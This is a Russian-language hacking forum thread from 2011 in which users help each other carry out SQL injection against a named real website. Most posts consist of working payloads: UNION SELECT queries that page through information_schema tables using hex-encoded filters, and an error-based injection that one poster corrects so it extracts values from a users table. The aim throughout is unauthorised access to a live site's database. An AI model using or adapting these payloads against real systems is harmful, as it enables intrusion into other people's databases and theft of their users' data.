bc_tovar_id=2-1+UNION+SELECT+1,2,3,4,group_concat%28table_name%2 9,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,7 3,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89, 90,91,92,93,94,95,96,97,98,99,100,101,102,103,104, 105,106,107,108,109,110,111,112,113,114,115,116,11 7,118,119,120,121,122,123,124,125,126,127,128,129, 130,131,132,133,134,135,136,137,138,139,140,141,14 2,143,144,145,146,147,148,149,150,151+from+informa tion_schema.schemata+where+table_name%3E'table_200 '#

сразу всё обрубается и дальше остальные таблици показывать не хочет помогите плз!

FreN4
05.07.2011, 13:43
Фараон said:
Ссылку. Античат - форум экстрасенсов.




Code:
http://www.bsgv.ru/ipo_calc.php?bc_tovar_id=2-1+UNION+SELECT+1,2,3,4,group_concat%28table_name%2 9,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,7 3,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89, 90,91,92,93,94,95,96,97,98,99,100,101,102,103,104, 105,106,107,108,109,110,111,112,113,114,115,116,11 7,118,119,120,121,122,123,124,125,126,127,128,129, 130,131,132,133,134,135,136,137,138,139,140,141,14 2,143,144,145,146,147,148,149,150,151+from+informa tion_schema.tables+where%20table_name%3Etable_200#

aka_zver
05.07.2011, 13:45
FreN4 said:
привет
нужна помосчь!
есть скуля но при дописывании limit или

Code:
bc_tovar_id=2-1+UNION+SELECT+1,2,3,4,group_concat%28table_name%2 9,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,7 3,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89, 90,91,92,93,94,95,96,97,98,99,100,101,102,103,104, 105,106,107,108,109,110,111,112,113,114,115,116,11 7,118,119,120,121,122,123,124,125,126,127,128,129, 130,131,132,133,134,135,136,137,138,139,140,141,14 2,143,144,145,146,147,148,149,150,151+from+informa tion_schema.schemata+where+table_name%3E'table_200 '#

сразу всё обрубается и дальше остальные таблици показывать не хочет помогите плз!


какой вы интересный товарищ)


Code:
+UNION+SELECT+1,2,3,4,group_concat(0x3a,table_name ),6,...,151+from+information_schema.tables%23

или


Code:
+UNION+SELECT+1,2,3,4,table_name,6,...,151+from+in formation_schema.tables+limit+0,1%23

а имя таблицы в кавычках, захексить бы

winstrool
05.07.2011, 19:41
FreN4 said:
привет
нужна помосчь!
есть скуля но при дописывании limit или

Code:
bc_tovar_id=2-1+UNION+SELECT+1,2,3,4,group_concat%28table_name%2 9,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,7 3,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89, 90,91,92,93,94,95,96,97,98,99,100,101,102,103,104, 105,106,107,108,109,110,111,112,113,114,115,116,11 7,118,119,120,121,122,123,124,125,126,127,128,129, 130,131,132,133,134,135,136,137,138,139,140,141,14 2,143,144,145,146,147,148,149,150,151+from+informa tion_schema.schemata+where+table_name%3E'table_200 '#

сразу всё обрубается и дальше остальные таблици показывать не хочет помогите плз!


На сколько знаю, group_concat() выводит только первые 1024 символа и с limit он не работает...

swad
05.07.2011, 22:11
Использую конструкцию:


-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(
DATABASE()
, 1, 63), FLOOR(RAND(0)*2))) --


В ошибке на странице выдаёт название базы данных.

Пытаюсь применить эту конструкцию для другого запроса:


-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(
SELECT user_1 FROM users
, 1, 63), FLOOR(RAND(0)*2))) --


Выдаёт ошибку, но команду не выполняет:


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT user_1 FROM users, 1, 63), FLOOR(RAND(0)*2))) -- '' at line 1


В итоге возникает вопрос. Как заставить выполниться команду


SELECT user_1 FROM users


Название столбца и таблицы точно эти.

winstrool
05.07.2011, 22:20
swad said:
Использую конструкцию:
В ошибке на странице выдаёт название базы данных.
Пытаюсь применить эту конструкцию для другого запроса:
Выдаёт ошибку, но команду не выполняет:
В итоге возникает вопрос. Как заставить выполниться команду
Название столбца и таблицы точно эти.


добавь к конструкции limit 0,1

вот пример:


-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((SELECT user_1 FROM users limit 0,1), 1, 63), FLOOR(RAND(0)*2))) --

swad
06.07.2011, 02:09
winstrool

Спасибо)

FreN4
06.07.2011, 02:53
winstrool said:
На сколько знаю, group_concat() выводит только первые 1024 символа и с limit он не работает...


я пробовал и просто с лимитом и посмотри какой я запрос выше прислал,там всё я сделал правильно!)))))

M_script
06.07.2011, 10:00
FreN4,

Узнаем количество таблиц, исключая information_schema:


Code:
2-1+UNION+SELECT+1,2,3,4,count(*),6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,6 3,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79, 80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96 ,97,98,99,100,101,102,103,104,105,106,107,108,109, 110,111,112,113,114,115,116,117,118,119,120,121,12 2,123,124,125,126,127,128,129,130,131,132,133,134, 135,136,137,138,139,140,141,142,143,144,145,146,14 7,148,149,150,151+from+information_schema.tables+w here+table_schema!=0x696E666F726D6174696F6E5F73636 8656D61+--+

Выводим таблицы с начала:


Code:
2-1+UNION+SELECT+1,2,3,4,group_concat(table_name),6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57, 58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74 ,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,9 1,92,93,94,95,96,97,98,99,100,101,102,103,104,105, 106,107,108,109,110,111,112,113,114,115,116,117,11 8,119,120,121,122,123,124,125,126,127,128,129,130, 131,132,133,134,135,136,137,138,139,140,141,142,14 3,144,145,146,147,148,149,150,151+from+information _schema.tables+where+table_schema!=0x696E666F726D6 174696F6E5F736368656D61+--+

Выводим таблицы после binn_categs:


Code:
2-1+UNION+SELECT+1,2,3,4,group_concat(table_name),6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57, 58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74 ,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,9 1,92,93,94,95,96,97,98,99,100,101,102,103,104,105, 106,107,108,109,110,111,112,113,114,115,116,117,11 8,119,120,121,122,123,124,125,126,127,128,129,130, 131,132,133,134,135,136,137,138,139,140,141,142,14 3,144,145,146,147,148,149,150,151+from+information _schema.tables+where+table_schema!=0x696E666F726D6 174696F6E5F736368656D61+and+table_name>0x62696E6E5F636174656773+--+